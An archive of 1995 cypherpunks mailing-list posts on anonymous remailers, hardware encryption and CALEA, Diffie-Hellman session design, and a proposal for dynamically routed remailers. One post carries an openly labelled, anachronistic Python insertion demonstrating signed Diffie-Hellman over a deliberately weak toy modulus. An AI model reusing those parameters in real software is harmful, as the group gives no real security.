secure enough for secret storage aren't exactly "typical" of what's out
there on the Internet.  And even an Orange book A rated system has to
be kept locked up, under guard and administered properly if you want to
be sure that the secret data stored on it remain secret.

The vast majority of unattended "server" machines in my online life are
neither located in well-controlled environments (especially considering
backup tapes) nor administered particularly well.  I'm not sure that
persistent signature keys stored on such hosts provide much extra
assurance of machine identity beyond what already comes from their
answering to the expected IP address (which is hardly saying much, of
course).  I think better than expecting the world to switch over to
cumbersome, multilevel secure OSs is to equip such servers with
inexpensive tamper-resistant cryptographic modules that never reveal
their secrets.  At least then you're guaranteed that there can be only
one instance of a machine's identity out there at a time, and have some
hope of detecting the theft of the key material.  (There may be some
hope on this front.  PCMCIA crypto modules like the NS iPower card are
beginning to hit the market already, and products like that may well be
commonplace by the time host authentication protocols start to be
deployed for real on the Internet.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@rebma.rebma.mn.org
Date: Tue, 31 Jan 95 01:56:20 PST
To: cypherpunks@toad.com
Subject: nullWhat's Killing My Remailed Posts?
Message-ID: <199501311018.EAA01333@rebma.rebma.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


[Please  Reply-To: an105@vox.xs4all.nl  as I am not receiving the group
or list on which this message _hopefully_ appears.  Thanks!]

Though I have been vigorously using the various remailers for a long
time, I am stumped by my sudden inability to get a post to a newsgroup
by any remailed means.  Example:  For a long time I have used the
following boilerplate form with usura@replay.com with flawless results:

::
Encrypted: PGP

::
Anon-To: my.anon.address@somewhere.org
Cutmarks: *

| Message Successfully Remailed, # 999

*
::
Anon-To: mail2news@demon.co.uk
Cutmarks: ___
Latent-Time: +6:00r

##
Newsgroups: alt.some.group,misc.another.group
Subject: Furballs in Wolverines

My wolverine has nasty furballs...
[...]
My wolverine thanks you all for suggestions...
___


The current status of this is that I get the remailed receipt, but the
message never shows in the group.  Is mail2news@demon.co.uk down?

I tried using the Usura Anon-Post-To: feature, but it fails as well.

I've tried using _other_ remailers with the simple form...

        Anon-To: alt.some.group@comlab.ox.ac.uk
        Anon-To: alt.some.group.usenet@decwrl.dec.com
        Anon-To: alt.some.group@bull.com

I've also tried Request-Remailing-To: with the same address form.  Nada.

I have been unable to make any of the usual remailers get through to the
groups by any means for about three weeks, though evidence shows that
the remailers are certainly getting the messages, as I can send anon
netmail messages - - - the _posts_ just never show.

I periodically suspect that someone somewhere is running a program to
sweep all posts with "remail," "nobody" or "anon" anywhere in the
header. 

Any thoughts on this...assuming it shows here?



___ Blue Wave/QWK v2.12




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nobody@eniac.ac.siue.edu (Anonymous)
Date: Tue, 31 Jan 95 02:52:50 PST
To: cypherpunks@toad.com
Subject: Re: Is the remailer crisis over?
Message-ID: <199501311044.EAA12304@eniac.ac.siue.edu>
MIME-Version: 1.0
Content-Type: text/plain


Samuel Kaplin <skaplin@mirage.skypoint.com> wrote:

> Well folks as of 11:30 on 1-30-94 there are 14 remailers with uptimes
> greater than 99%. What's the consensus...Is the remailer crisis over?

It'll be over when they are equally distributed across countries, not
90+% in the USA as is currently the case.  However, 14 is a good start
and perhaps the Rest Of The World will catch up.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Beattie <beattie@PEAK.ORG>
Date: Tue, 31 Jan 95 07:50:45 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <Pine.3.89.9501301030.A25404-0100000@netcom10>
Message-ID: <Pine.3.88.9501310716.A5290-0100000@PEAK.ORG>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Jan 1995, James A. Donald wrote:

> 
> Perry,  I listed a huge number of the things that anonymous
> is complaining about, under the thread heading "Even more 
> holy war on unix"
> 
> I listed them precisely in response to flames like yours
> challenging me to name such things.
> 
> If you ask "Such as" then someone is going to answer again.
> 
> The Holy Warriors of the Sacred Unix demand facts, then
> scream like nasty children when someone answers this demand.

Did I miss something?  Was there a posting of facts amongst
those volumes of uninformed opinions?

> 
> They say "Put up or shut up", and then send a torrent of 
> savage hate mail when somebody puts up.

Yes, it's so sad when people hold opinions that differ from yours

> 
> 
> 
>  ---------------------------------------------------------------------
>                                           |  
> We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
> and our property, because of the kind     |  
> of animals that we are. True law          |   James A. Donald
> derives from this right, not from the     |  
> arbitrary power of the omnipotent state.  |   jamesd@netcom.com
> 
> 

Brian Beattie         | [From an MIT job ad] "Applicants must also have
                      | extensive knowledge of UNIX, although they should
beattie@csos.orst.edu | have sufficently good programming taste to not
Fax (503)754-3406     | consider this an achievement."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hkhenson@cup.portal.com
Date: Tue, 31 Jan 95 08:41:21 PST
To: cypherpunks@toad.com
Subject: commercial authecation
Message-ID: <9501310840.1.10673@cup.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Some time ago (perhaps even two years back) I seem to remember
discussion here--or in a related area--about a service some former
Bell Labs people were offering.  It was a time stamp/authentication
service which depended in part on publishing of a hash in a paper
of record.  I now find I have need for this service.  Pointers to
this service (by email) would be much appreciated.  Keith Henson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Tue, 31 Jan 95 06:13:58 PST
To: jim@rsa.com
Subject: AT&T and VLSI Encryption device
Message-ID: <33192.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Today's (1/31) Washington Post has a tiny blurb that AT&T and VLSI will
announce a hardware encryption device for use in lots of
communications devices, including cell phones, PDAs, etc.

Today's Wall Street Journal has a bit more, says that it uses
3-DES and is a market rejection of Clipper. Also contains a quote
from Jim Bidzos of RSA/PKP. But there is little detail. There
was no mention of what PKP technology is used in the hardware.
I assume that AT&T has licensed DH for session key exchange.
They could be using RSA with the keys embedded in ROM/EEPROM.

Anyone got any technical details?

Thanks
Pat

Pat Farrell      Grad Student                 pfarrell@cs.gmu.edu
Department of Computer Science    George Mason University, Fairfax, VA
Public key available via finger         #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Tue, 31 Jan 95 09:46:20 PST
To: cypherpunks@toad.com
Subject: Re: AT&T and VLSI Encryption device
Message-ID: <v03001106ab541cedd91c@[140.174.229.210]>
MIME-Version: 1.0
Content-Type: text/plain


At 07:21 1/31/95, Perry E. Metzger wrote:
>"Pat Farrell" says:
>> Today's (1/31) Washington Post has a tiny blurb that AT&T and VLSI will
>> announce a hardware encryption device for use in lots of
>> communications devices, including cell phones, PDAs, etc.
>
>This is the device I posted a newswire article about a couple of weeks
>ago. No details, but it looks cute.

How does this device conform with the legislated requirement that it must
deliver plaintext to the government upon court-approved demand?

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
And so these men of Indostan/ disputed long and loud/ each in his own  |
opinion/ exceeding stiff and strong/ though each was partly right/ and |
all were in the wrong! - John Godfrey Saxe                             |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Barrett <barrett@daisy.ee.und.ac.za>
Date: Mon, 30 Jan 95 23:56:13 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <9501302104.AA24274@snark.imsi.com>
Message-ID: <Pine.NEB.3.91.950131094454.21652n-100000@daisy.ee.und.ac.za>
MIME-Version: 1.0
Content-Type: text/plain


> > Right - using DH exchange is probably appropriate in situations where
> > there are no pre-established credentials for the party on the other
> > machine.
> 
> D-H also provides perfect forward secrecy, which is a reason to use it
> even if there is already an established set of credentials.

How about public-key signing the D-H exchange?  Public key to eliminate[*]
the man-in-the-middle attack, and D-H for forward secrecy.

* Almost eliminate.  A sufficiently powerful man in the middle could 
  conceivably subvert the public keys.

--apb (Alan Barrett)
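
[Added example, not part of any post in this thread and not ESP's code:
the two designs discussed in this thread, in Python.  It covers the
well-known published server half-key with a signed client half-key, and
the signed ephemeral D-H exchange suggested above.  The 2**521 - 1 toy
modulus, the Schnorr signatures standing in for PGP/RSA signatures, and
every function name are assumptions of this example.]

```python
import hashlib
import secrets

# Toy parameters (assumption, constructed for this example): P = 2**521 - 1 is
# prime, which keeps the block self-contained, but P - 1 is smooth, so this is
# NOT a group to use for real Diffie-Hellman.
P = 2**521 - 1
Q = P - 1              # g**Q == 1 (mod P), so exponents can be reduced mod Q
G = 3
TAG = b"dh-half-key|"  # domain separator for signed half-keys (hypothetical)


def enc(n):
    return n.to_bytes(66, "big")


def keygen():
    """Return (secret exponent x, public value g**x mod P)."""
    x = secrets.randbelow(Q - 2) + 2
    return x, pow(G, x, P)


def _challenge(r, msg):
    return int.from_bytes(hashlib.sha256(enc(r) + msg).digest(), "big")


def sign(x, msg):
    """Schnorr signature (e, s) on msg under secret x (stand-in for PGP/RSA)."""
    k = secrets.randbelow(Q - 2) + 2
    e = _challenge(pow(G, k, P), msg)
    return e, (k + e * x) % Q


def verify(y, msg, sig):
    e, s = sig
    if not (1 < y < P and 0 <= e < Q and 0 <= s < Q):
        return False
    r = pow(G, s, P) * pow(y, Q - e, P) % P   # g**s * y**(-e) recovers g**k
    return _challenge(r, msg) == e


def kdf(shared):
    return hashlib.sha256(enc(shared)).hexdigest()


def unauthenticated_mitm():
    """Plain D-H: an active relay ends up sharing a key with each side."""
    a, A = keygen()                  # client
    b, B = keygen()                  # server
    m, M = keygen()                  # relay substitutes M for both half-keys
    return (kdf(pow(M, a, P)) == kdf(pow(A, m, P))
            and kdf(pow(M, b, P)) == kdf(pow(B, m, P)))


def client_connect(sign_key, server_published):
    # The server half-key is never taken from the wire, so it cannot be swapped.
    a, A = keygen()
    return A, sign(sign_key, TAG + enc(A)), kdf(pow(server_published, a, P))


def server_accept(x_server, known_clients, client_id, A, sig):
    # Freshness/replay of a signed half-key is out of scope here; a replayed
    # half-key still gives the replayer no way to compute the session key.
    y = known_clients.get(client_id)
    if y is None or not verify(y, TAG + enc(A), sig):
        return None                  # unknown client or substituted half-key
    return kdf(pow(A, x_server, P))


def published_halfkey_session(tamper=False):
    x_srv, Y_srv = keygen()          # Y_srv is the well-known published half
    sk_cli, pk_cli = keygen()        # client's long-term signing key
    A, sig, client_key = client_connect(sk_cli, Y_srv)
    if tamper:
        _, A = keygen()              # relay swaps in its own half-key
    return client_key, server_accept(x_srv, {"alice": pk_cli}, "alice", A, sig)


def later_theft_of_static_x():
    """Cost of the static server half: a recorded A plus a stolen x gives the key."""
    x_srv, Y_srv = keygen()
    sk_cli, _ = keygen()
    A, _sig, client_key = client_connect(sk_cli, Y_srv)
    return kdf(pow(A, x_srv, P)) == client_key


def signed_ephemeral_session():
    """Both halves are per-session and signed; signing keys never touch the key."""
    sk_c, pk_c = keygen()
    sk_s, pk_s = keygen()
    a, A = keygen()
    b, B = keygen()
    sig_a, sig_b = sign(sk_c, TAG + enc(A)), sign(sk_s, TAG + enc(B))
    if not (verify(pk_c, TAG + enc(A), sig_a) and verify(pk_s, TAG + enc(B), sig_b)):
        return None
    return kdf(pow(B, a, P)), kdf(pow(A, b, P))
```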




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Tue, 31 Jan 95 10:01:23 PST
To: cypherpunks@toad.com
Subject: RE: "bad" government
Message-ID: <9501311801.AA25120@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Richard F. Dutcher"

What's your point?  Got a principle that *hasn't* been
used/abused?
..................................................

The original statement I made was in response to Richard Moore, who was 
wondering out loud why someone else on this list was "on the wrong 
side";   I remarked in essence that he likewise is seemingly on that 
side, as cryptography, in its development, is designed to serve the 
purposes of individuals in disproportion to governmental control over it.

I'm not assuming that "privacy and protection from arbitrary power are 
solely libertarian concerns" either.   Yet I don't need to "check out 
the ACLU and Amnesty International ..." to understand the many 
possibilities and dangers.

My remarks were intended to indicate that it isn't necessary to inspect 
the varying degrees of comparative corruption or betterment in any of 
the institutions which these political arguments encourage;  if you 
understand full well the principle involved, or what it is that is 
"wrong", then it shouldn't be too difficult to see the similar 
impropriety wherever it becomes manifest.

     ..
Blanc









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 31 Jan 95 07:09:03 PST
To: cypherpunks@toad.com
Subject: NYT on Fermat Proof
Message-ID: <199501311508.KAA20666@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


A long article (16k) today on Dr. Andrew Wiles's dramatic, successful
struggle to close the gap in his proof of Fermat's last theorem. 
 
 
For email copy send blank message to <jya@pipeline.com> with subject: 
FERM_hak 
 
 
Here are excerpts: 
 
 
   Fermat's last theorem which has tantalized mathematicians 
   for more than 350 years, has at last been solved, say those 
   who have read the revised but not yet published proof. But 
   the endgame of this furious chase has proved as full of 
   last-minute surprises as a murder mystery.
 
 
   For Dr. Andrew Wiles of Princeton University, the chief 
   author of the proof, triumph had to be snatched from the 
   jaws of disaster. His first proof, which aroused world-wide 
   attention when announced two years ago, turned out to 
   contain a gap, which Dr. Wiles found he was unable to cross 
   alone. 
 
   *** 
 
   But he went back to the Flach method for one last time. 
   "There was one variant in the original argument that I'd 
   convinced myself wouldn't work but I hadn't convinced him," 
   Dr. Wiles said. "I was sitting at my desk one morning 
   really trying to pin down why the Flach method wasn't 
   working when, in a flash, I saw that what was making it not 
   work was exactly what would make a method I'd tried three 
   years before work. It was totally unexpected. I didn't 
   quite believe it." He dashed down from the attic to tell 
   his wife. Although his enthusiasm was infectious, Dr. Wiles 
   said, "I actually think she didn't believe me."
 
   *** 
 
   Dr. Wiles said that the breakthrough came in figuring out 
   how to glue together an infinite collection of mathematical 
   objects called Hecke rings. He had initially been creating 
   what was "a very natural relationship between these objects 
   -- natural in the sense that you can give a clear 
   definition of the maps between them." It was an inductive 
   argument. The idea was to take one element of a set and use 
   that to find the next element, then to use the second to 
   construct a third, and so on. 
 
 
   The new idea, Dr. Wiles said, "was to simply construct 
   artificial maps between these objects." 
 
 
   "You wouldn't show a relationship explicitly," he said, but 
   would use a counting argument to prove that a relationship 
   had to exist. The basic idea is to use the pigeonhole 
   principle: if you have more objects than pigeonholes to put 
   them in, then at least one pigeonhole must contain more 
   than one object. 
 
 
   The complete argument involves creating an infinite 
   sequence of sets of pigeonholes and then showing that there 
   must be objects that show up in every set of pigeonholes. 
   This allowed Dr. Wiles and Dr. Taylor to prove that there
   must be an infinite set of Hecke rings that share a 
   relationship, although they never have to specify exactly 
   what that relationship is. 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 31 Jan 95 07:22:34 PST
To: pfarrell@netcom.com
Subject: Re: AT&T and VLSI Encryption device
In-Reply-To: <33192.pfarrell@netcom.com>
Message-ID: <9501311521.AA24977@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"Pat Farrell" says:
> Today's (1/31) Washington Post has a tiny blurb that AT&T and VLSI will
> announce a hardware encryption device for use in lots of
> communications devices, including cell phones, PDAs, etc.

This is the device I posted a newswire article about a couple of weeks
ago. No details, but it looks cute.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jltocher@CCGATE.HAC.COM
Date: Tue, 31 Jan 95 10:58:48 PST
To: cypherpunks@toad.com
Subject: Z-Mail
Message-ID: <9500317915.AA791578665@CCGATE.HAC.COM>
MIME-Version: 1.0
Content-Type: text/plain


     Can someone please email me with details about obtaining and 
     configuring Z-Mail for use with PGP?
     Thanks,
     John
     
John L. Tocher                THE CITY-a bounded infinity.   A labyrinth where
JLTocher@ccgate.HAC.com       you are never lost. Your private map where every
PGP:  CE 72 1A 11 07 47 35    block bears exactly the same number. Even if you
35 9A C1 DE EA 64 21 BC 94    lose your way, you cannot go wrong.   --Kobo Abe







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Tue, 31 Jan 95 11:02:57 PST
To: perry@imsi.com
Subject: Re: AT&T and VLSI Encryption device
Message-ID: <v03001108ab5431879c3e@[140.174.229.228]>
MIME-Version: 1.0
Content-Type: text/plain


At 09:55 1/31/95, Perry E. Metzger wrote:
>Michael Sattler says:
>>
>> How does this device conform with the legislated requirement that it must
>> deliver plaintext to the government upon court-approved demand?
>
>There is no such requirement.

I was under the impression that "the Communications Assistance for Law
Enforcement Act requires equipment manufacturers and telecommunications
carriers to develop network technologies that are readily wiretapped" (from
Garfinkel's book).  Doesn't a "hardware encryption device for use in lots
of communications devices, including cell phones, PDAs, etc." seem to fall
into that category?

If it doesn't then I have no idea what CALEA is supposed to do.

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
And so these men of Indostan/ disputed long and loud/ each in his own  |
opinion/ exceeding stiff and strong/ though each was partly right/ and |
all were in the wrong! - John Godfrey Saxe                             |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 31 Jan 95 09:55:32 PST
To: Michael Sattler <msattler@jungle.com>
Subject: Re: AT&T and VLSI Encryption device
In-Reply-To: <v03001106ab541cedd91c@[140.174.229.210]>
Message-ID: <9501311755.AA25178@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Sattler says:
> At 07:21 1/31/95, Perry E. Metzger wrote:
> >"Pat Farrell" says:
> >> Today's (1/31) Washington Post has a tiny blurb that AT&T and VLSI will
> >> announce a hardware encryption device for use in lots of
> >> communications devices, including cell phones, PDAs, etc.
> >
> >This is the device I posted a newswire article about a couple of weeks
> >ago. No details, but it looks cute.
> 
> How does this device conform with the legislated requirement that it must
> deliver plaintext to the government upon court-approved demand?

There is no such requirement.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 31 Jan 95 13:06:33 PST
To: remailer-operators@c2.org
Subject: Cypherpunks CD-ROM
Message-ID: <199501312102.NAA10622@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I am putting together a CD-ROM covering cryptography, privacy,
remailers, etc.. essentially the whole cypherpunk bit.

	Please send contributions/suggestions/comments/flames to
sameer@c2.org.

	Thanks.
-- 
sameer						Voice:   510-841-2014
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-549-1383
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt@iquest.net (Al Thompson)
Date: Tue, 31 Jan 95 10:28:43 PST
To: cypherpunks@toad.com
Subject: Re: "bad" government
Message-ID: <m0rZNJT-000E68C@dorite.use.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>>From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
>
>>Governments as a whole are seen to be "bad" because they invariably undermine
>the right of the individual to make choices for themselves.
>
>Quite untrue. It's society which provides you with an environment in which
>you have choices. And its government which orders that society. It's
>because government has served you so well, that you have luxury to
>fantasize you don't need it. You're being duped.
  
Government does indeed "order society."  However, "order" does not
equate to liberty, luxury, or to individual freedom.
 
If strong government resulted in liberty and freedom, then the
most intrusive, all-encompassing governments would result in 
its citizens having the most liberty.  Is this the case?  I would
look at the (former) Soviet Union, Iran, Cuba, East Germany, etc., 
for your answer.
 
Individual liberties do not necessarily result in an "orderly
society."  In fact, an imposed "order" on society, by definition,
must result in limited liberties.
 
Apply this to anonymous remailers, and encrypted personal mail, and you can 
easily see how the government imposing "order" would
result in the end of those activities.

************************************************************
*           Just your basic signature block                *
*                                                          *
*  Al Thompson                                             *
*  Fidonet 1:231/110                                       *
*  alt@iquest.net                                          *
************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Tue, 31 Jan 95 10:56:40 PST
To: cypherpunks@toad.com
Subject: URGENT - MS hack of FFS
Message-ID: <9501311856.AA06222@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Could somebody here please give me the reference for the full version of
Micali and Shamir's hack of the Fiat-Shamir family of authentication
schemes. I need it to make sure that what I've put in the class notes for
an IAP course I am teaching is correct. I have the short paper (An
improvement of the Fiat-Shamir Identification and Signature Scheme) from
Crypto '88 (I think), but I need the full version. If anybody here can get
me the reference before the libraries here close tonight, I'd really
appreciate it.

Thanks,

Jason W. Solinsky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiego.ATTGIS.COM>
Date: Tue, 31 Jan 95 17:51:00 PST
To: cypherpunks@toad.com
Subject: Re: Z-Mail
Message-ID: <9501311709.aa18334@ncrhub1.ATTGIS.COM>
MIME-Version: 1.0
Content-Type: text/plain


I would be interested also.  How about cc  this list...

>     Can someone please email me with details about obtaining and 
>     configuring Z-Mail for use with PGP?
>     Thanks,
>     John
>     
>John L. Tocher                THE CITY-a bounded infinity.   A labyrinth where
>JLTocher@ccgate.HAC.com       you are never lost. Your private map where every
>PGP:  CE 72 1A 11 07 47 35    block bears exactly the same number. Even if you
>35 9A C1 DE EA 64 21 BC 94    lose your way, you cannot go wrong.   --Kobo Abe
>
>
>
>
>
                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.
PGP-encrypted e-mail welcome!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 31 Jan 95 11:11:38 PST
To: Michael Sattler <msattler@jungle.com>
Subject: Re: AT&T and VLSI Encryption device
In-Reply-To: <v03001108ab5431879c3e@[140.174.229.228]>
Message-ID: <9501311911.AA25266@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Sattler says:
> At 09:55 1/31/95, Perry E. Metzger wrote:
> >Michael Sattler says:
> >>
> >> How does this device conform with the legislated requirement that it must
> >> deliver plaintext to the government upon court-approved demand?
> >
> >There is no such requirement.
> 
> I was under the impression that "the Communications Assistance for Law
> Enforcement Act requires equipment manufacturers and telecommunications
> carriers to develop network technologies that are readily wiretapped" (from
> Garfinkel's book).  Doesn't a "hardware encryption device for use in lots
> of communications devices, including cell phones, PDAs, etc." seem to fall
> into that category?

The manufacturers of switching equipment are supposed to make it easy
to get at individual conversations. Nothing in the act forces
customers to make the contents of the conversations comprehensible.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Tue, 31 Jan 95 11:13:44 PST
To: mac5tgm@hibbs.vcu.edu (Greg Morgan)
Subject: Re: Better living through better `procmail'
In-Reply-To: <9501311906.AA27997@hibbs.vcu.edu>
Message-ID: <199501311916.OAA05295@hermes.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


In response to quite a few people asking,

Procmail can be found at 
ftp.informatik.rwth-aachen.de as pub/packages/procmail/procmail.tar.gz

safe-tcl, which some people prefer, is at
ftp.ics.uci.edu:mrose/safe-tcl/safe-tcl.tar.Z

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kevin@elvis.wicat.com
Date: Tue, 31 Jan 95 13:53:01 PST
To: cypherpunks@toad.com
Subject: Frothing remailers - an immodest proposal
Message-ID: <9501312152.AA10208@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


It seems to me that the current remailer web suffers a fundamental flaw.
It is simply too static. When a remailer disappears, service is
disrupted and messages are lost. Humans have to statically route their
messages through the web either by hand or using relatively primitive
tools such as the chain script (not to belittle the useful work that has
been done, but it is by no means idiot proof yet). Basically, the
current web of mailers shows nothing of the dynamic nature that has kept
the internet alive and has offered us a decent chance at truly anonymous
communications, nor is it easy to use to its full potential.

Consider a more dynamic web of remailers. I envision remailers that
actively advertise their presence on the web so that all active
remailers are aware of all other active remailers. This advertising is
to have very low latency so that a new mailer can be known to the web
within minutes (I will address the implementation of this later). Thus,
remailers can constantly be appearing and disappearing without impact on
the web as a whole (I refer to this dynamic web of remailers as a
"froth"). Imagine also that remailers are allowed to dynamically perform
the routing functions that are currently done statically offline (for
reasons I will discuss shortly).

Now, given all this, what do we gain? First, consider my situation
(which is what started me on this line of thinking); my company has a
leased 56K internet link. I cannot consume this valuable bandwidth with
a remailer during business hours. However, if remailers could pop up and
announce their presence to the web, I could run a transient remailer for
several hours in the wee hours of the morning when the line use is
minimal.

Another benefit would be the possibility of remailers with no fixed
physical location. A remailer can shift from host machine to host
machine daily, as long as there is a decent mechanism to locate it.

The use of such transient routers implies allowing dynamic routing. If
any given remailer may go down or move at any point, it is impractical
to expect users to keep track of which are up at the moment and create
static routes in the current manner. The only reasonable solution I have
come up with is to allow the remailers themselves to choose routing,
given that they have full knowledge of the current state of the froth.

This also confers additional benefits. It has been pointed out that most
traffic across the web is currently unencrypted. It seems to me that any
such message should be fair game. The remailer should be allowed to
encrypt the message and pick a pseudo-random path through the web,
incorporating transient remailers along the way. This adds greatly to
the encrypted traffic on the net, as well as making sure that the
transient remailers are used. It even provides some degree of privacy to
originally non-encrypted messages.

We could of course still allow users to statically route their messages
through the web, or allow combinations (I want this message routed
through remailers A and B to endpoint C; however, remailers are granted
authority to route this message through a maximum of three additional,
randomly chosen remailers between each step). This has the added
advantage of taking the work of routing messages off the user (unless
they really want it). Think about the proposed extension to MixMaster to
allow separate parts of a multi-part message to be routed separately,
and consider whether you really want to have to do this by hand. I
strongly suspect that most messages are currently routed via boilerplate
scripts, which has to make the job of traffic analysis much easier for
our good friend Eve.

By the way, a brief rant on a related topic; people speak of not
trusting remailers any further than necessary, while I am clearly
suggesting granting more authority and trust to the remailers. This
notion of not assigning trust is simply nonsense. When you send a piece
of mail to a remailer, encrypted or not, you are assigning complete
trust in that remailer to keep you anonymous and not to forward your
mail to the NSA immediately.

This does lead to a related problem, however; if we allow remailers to
pop up at random and join in the froth, how do we know that Deitweiller
won't set up a number of black hole remailers that take your mail and
throw it away, disrupting the froth, or forward it to nphard@nsa.gov?
Fortunately, we already have the PGP web of trust model in place and can
use it to good effect in this case. Remailers should simply not route
mail through any remailer whose public key is not trusted unless
explicitly ordered otherwise. This requires remailer operators to
cooperate to some extent to validate one another's remailer keys, but
does confer the great advantage of portable remailers as mentioned
above; if I run a trusted remailer on one machine, I can move it to
another machine, and as soon as I advertise the new address and the PGP
public key, it is a trusted and useful part of the froth.

While we are advertising a PGP key and internet address, we might as
well incorporate other useful information. For instance, remailers could
advertise their maximum latency. This would allow us to send messages
into the froth with the instructions "Keep this message moving for at
least one hour and at most three hours and then deliver to endpoint C"
and allow remailers to make informed decisions about routing this
message (there are some interesting issues in making routing decisions;
if we can assign a cost to the link between each pair of remailers, do
we want to attempt to optimize the route for least cost? Or stick with
random routing to attempt to hinder traffic analysis?). I'm sure that we
can come up with other useful information to assist routing decisions
(available bandwidth, cost per letter, protocols supported, etc.)

Now, the question of implementing remailer advertising. If there is an
existing internet protocol for advertising entities with sufficiently
low latency, I am not aware of it (my background is in Novell and OS/2,
so I'll happily be corrected!) DNS is the closest model to what I want,
but is excessively tied up in bureaucracy and has horrific propagation
times. Thus, we will have to roll our own.

I can think of two reasonable solutions to this problem. The first is a
central authority model: there exist well known servers that each
remailer has to report into when starting up and shutting down. This
model has obvious benefits (ease of use and implementation, minimal
bandwidth usage) and obvious drawbacks (a single point of failure, or at
best very few, distinctly against the cypherpunk philosophy, requires
high-bandwidth, stable servers (read expensive)).

The second solution involves a broadcast model; each remailer
periodically broadcasts its presence to the entire net (say every T
minutes). Any process wanting a full list of all remailers simply has to
monitor the broadcast channel for T minutes to get at least a good
approximation. The problem here is one of delay (to locate a remailer, I
might have to wait T minutes) and bandwidth choking. Obviously, spamming
the entire internet with UDP packets advertising remailers would earn us
no friends (I'm not even sure that it's technically feasible). What we
need is a net of machines to carry the broadcast messages with numerous
well known access points.

By happy coincidence, there exists just such a network (actually,
several of them) that we can subvert for our twisted purposes. It's
called IRC. We can create a dedicated channel that carries the remailer
broadcast messages (to be honest, I have no real idea how to do this, but
one of the wonderHackers out there surely does? otherwise I might
actually be forced to read the RFCs (oh horror!)). I doubt that any
remailer operator will have trouble finding an IRC host to attach to in
order to monitor the broadcasts.

This is obviously a stopgap solution, but provides a method for
jumpstarting the froth without requiring a froth to advertise the froth.
With regard to the bandwidth concerns, I can't imagine that less
than a hundred remailers generating <1K messages every few minutes
(about ten minutes feels like a good value for T) can bring IRC to its
knees. When we get more than a hundred or so remailers up, we'll worry
about bandwidth!

And to the inherent latency problem of the broadcast model, the easiest
solution is to have well known servers cache the advertising information
for immediate access. Not too coincidentally, these caching servers look
a lot like the central point of authority servers in the first solution.
Thus, we can have both the convenience of a central authority model with
the dependable broadcast model to fall back on if it becomes necessary.
Unsolved problem, by the way: it would obviously be nice to have
human-readable names for remailers (the PGP key becomes the true unique
identifier, but I'd much rather pick "Soda remailer" from a list than
four lines of armored ASCII). How can we guarantee unique names and/or
prevent problems resulting from collisions?

Obviously, this process hasn't reached more than the pipe-dream stage
yet. I am very interested in comments and proposals before I start
trying to create some trial implementations. Be gentle, though - it's my
first time.



--
    Kevin
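
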